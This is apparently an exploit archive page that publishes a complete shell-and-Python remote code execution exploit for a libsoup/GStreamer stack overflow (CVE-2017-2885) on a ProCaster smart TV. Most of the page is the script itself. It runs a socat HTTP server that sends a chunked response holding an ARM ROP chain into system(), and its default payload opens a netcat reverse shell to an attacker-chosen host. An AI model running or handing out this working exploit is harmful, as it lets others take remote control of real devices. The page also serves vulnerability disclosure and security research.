what you don't know can hurt you

ProCaster LE-32F430 GStreamer souphttpsrc libsoup/2.51.3 Stack Overflow

ProCaster LE-32F430 GStreamer souphttpsrc libsoup/2.51.3 Stack Overflow
Posted Dec 7, 2020
Authored by def

ProCaster LE-32F430 SmartTV remote code execution exploit that leverages a stack overflow vulnerability in GStreamer souphttpsrc libsoup version 2.51.3.

tags | exploit, remote, overflow, code execution
advisories | CVE-2017-2885
MD5 | d18a43131bc124fd1e6a92560857602a

ProCaster LE-32F430 GStreamer souphttpsrc libsoup/2.51.3 Stack Overflow

Change Mirror Download
#!/bin/sh
# ProCaster LE-32F430 (NotSo)SmartTV remote code execution exploit through
# GStreamer souphttpsrc libsoup/2.51.3 HTTP stack overflow (CVE-2017-2885)
# ~ def <def@huumeet.info> 2020-02-15 ................. 850day exploit lol

# Exploit payload: ret2libc system() nc reverse shell with a clean exit()
CMD="${CMD:-/bin/busybox nc ${IP:-192.168.1.100} ${PORT:-54321} -e /bin/sh}"

case "${1:-${ACTION:-httpd}}" in # By default, start socat-based exploit server
httpd)
# Check dependencies
for PROGRAM in socat python3 dd wc; do
if ! command -v "$PROGRAM" >/dev/null; then
printf "Missing dependency: %s\n" "$PROGRAM"
exit 1
fi
done

# Parse bind address and port
case "${ARG=${2:-${HTTPD_BIND:-0.0.0.0:12345}}}" in
*:*) HTTPD_ADDR="${ARG%:*}"; HTTPD_PORT="${ARG#*:}" ;;
*) printf "Bad httpd [IPv4:PORT] bind arg: %s\n" "$ARG"; exit 1 ;;
esac >&2

# Start socat HTTP server
printf "HTTP souploit.sh server @ %s:%d\n" "$HTTPD_ADDR" "$HTTPD_PORT"
printf "Exploit system() payload: %s\n" "$CMD"
exec socat -v -x \
TCP-LISTEN:"$HTTPD_PORT,reuseaddr,fork,bind=$HTTPD_ADDR" \
EXEC:"\\'$0\\' request"
;;

-h|--help|help) printf "Usage: %s httpd [IPv4:PORT]\n" "$0"; exit 0 ;;

request) set -e ;;

*) printf "Unsupported %s action: '%s'\n" "$0" "$1" >&2; exit 1 ;;
esac

# GStreamer souphttpsrc dislikes fragmented HTTP responses (so buffer them)
flush_stdout() {
exec 1>&3 3>&-
dd if=/tmp/$$.stdout bs="$(wc -c </tmp/$$.stdout)" count=1 2>/dev/null
rm -f /tmp/$$.stdout
}
exec 3>&1 1>/tmp/$$.stdout
trap flush_stdout EXIT

# Parse HTTP request
IFS="$(printf '\t\r\n ')"
TIME="$(date '+%Y-%m-%d %H:%M:%S%z')"
if read -r METHOD URL HTTP && [ -n "$METHOD" -a -n "$URL" -a -n "$HTTP" ]; then
printf "[%s] %s %s %s\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2
while IFS="$IFS:" read -r KEY VALUE && [ -n "$KEY" -a -n "$VALUE" ]
do printf "[%s] %s: %s\n" "$TIME" "$KEY" "$VALUE"; done >&2
else
printf "[%s] '%s' '%s' '%s'\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2
printf "HTTP/1.1 400 Bad Request\r\n"
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
printf "Content-Length: 0\r\n"
printf "Connection: close\r\n"
printf "\r\n"
exit 0
fi

# Handle HTTP HEAD and GET
if [ "$METHOD" = "HEAD" ]; then
printf "HTTP/1.1 200 OK\r\n"
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
printf "Content-Type: %s\r\n" "${MIME:-"video/mp4"}"
printf "Content-Length: %d\r\n" "12345"
printf "Accept-Ranges: bytes\r\n"
printf "Connection: close\r\n"
printf "\r\n"
exit 0
elif [ "$METHOD" != "GET" ]; then
printf "HTTP/1.1 405 Not Allowed\r\n"
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
printf "Content-Length: 0\r\n"
printf "Connection: close\r\n"
printf "\r\n"
exit 0
fi

# Exploit payload
python3 -u - "$CMD" <<"EOF"
import sys, struct
command = sys.argv[1].encode() + b'\x00'
if len(command) > 108: raise Exception("Command length exceeds limit 108")
LE32, BE32 = lambda v: struct.pack('<I', v), lambda v: struct.pack('>I', v)
sys.stdout.buffer.write(b"".join([
#####################################
b"HTTP/1.1 206 OK\r\n", #
b"Transfer-Encoding: chunked\r\n", #
b"Connection: close\r\n", #
b"\r\n", #
#####################################
b"1\r\n", # start a chunk #
b">", # 4B alignment #
#####################################
LE32(0xAAAAAAAA), # padding #
LE32(0xBBBBBBBB), # padding #
LE32(0xCCCCCCCC), # padding #
#####################################
LE32(0x477B9C49), # (9) sym.exit
command.ljust(108), # system() command
LE32(0x4783A1E3), # (4) pc = add sp, 0x64; pop.w {r4, ..., r11, pc}
LE32(0x4784A7C7), # (7) r4 = ldr lr, [sp], 4; bx r3; bx lr
LE32(0x4783D287), # (2) r4 = mov r0, sp; blx r3
#####################################
BE32(0x01234567), # padding #
BE32(0x89ABCDEF), # padding #
#####################################
LE32(0x477C01E5), # (8) r8 = sym.system
LE32(0x477CF019), # (3) r8 = add sp, 0x6C; ldr pc, [sp], 4
LE32(0x478436F7), # (6) r10 = mov r3, r8; blx r4
LE32(0x478436F7), # (1) r10 = mov r3, r8; blx r4
LE32(0x477927A3), # (5) pc = sub sp, 0x98; bx r10
LE32(0x477927A3), # (0) pc = sub sp, 0x98; bx r10
#####################################
LE32(0x4787BB08), # valid pointer #
LE32(0x4787BB08), # valid pointer #
#####################################
b"\r\n" # payload EOF # 248B
#####################################
]))
EOF


Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    13 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close